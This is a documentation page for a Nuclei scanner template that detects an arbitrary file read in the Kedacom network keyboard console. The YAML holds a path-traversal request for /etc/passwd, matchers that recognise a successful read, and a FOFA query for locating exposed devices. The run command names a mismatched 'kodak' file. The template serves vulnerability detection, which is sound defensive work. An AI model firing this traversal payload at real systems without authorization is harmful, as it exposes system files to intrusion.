Kedacom Network Keyboard Console - Arbitrary File Read
ID: kedacom-network-lfi
Severity: high
Author: DhiyaneshDk
Tags: lfi,kedacom,network
Description
Section titled “Description”There is an arbitrary file reading vulnerability in the KEDACOM network keyboard console. Attacking this vulnerability can read arbitrary information from the server
YAML Source
Section titled “YAML Source”id: kedacom-network-lfi
info: name: Kedacom Network Keyboard Console - Arbitrary File Read author: DhiyaneshDk severity: high description: | There is an arbitrary file reading vulnerability in the KEDACOM network keyboard console. Attacking this vulnerability can read arbitrary information from the server reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E7%A7%91%E8%BE%BE%20%E7%BD%91%E7%BB%9C%E9%94%AE%E7%9B%98%E6%8E%A7%E5%88%B6%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: verified: true max-request: 1 fofa-query: "网络键盘控制台" tags: lfi,kedacom,network
http: - method: GET path: - "{{BaseURL}}/../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: word part: header words: - "text/html" - "Server: kedacom-hs" condition: and
- type: status status: - 200# digest: 4a0a0047304502203ed764efc9394376e5e36f3b09102de745dec73846bc55ff434ca30216bb6fba022100985f194d1a87b4b88c4119625c2d22563fea08f8350eaa340126922d8f78738d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/kodak-network-lfi.yaml"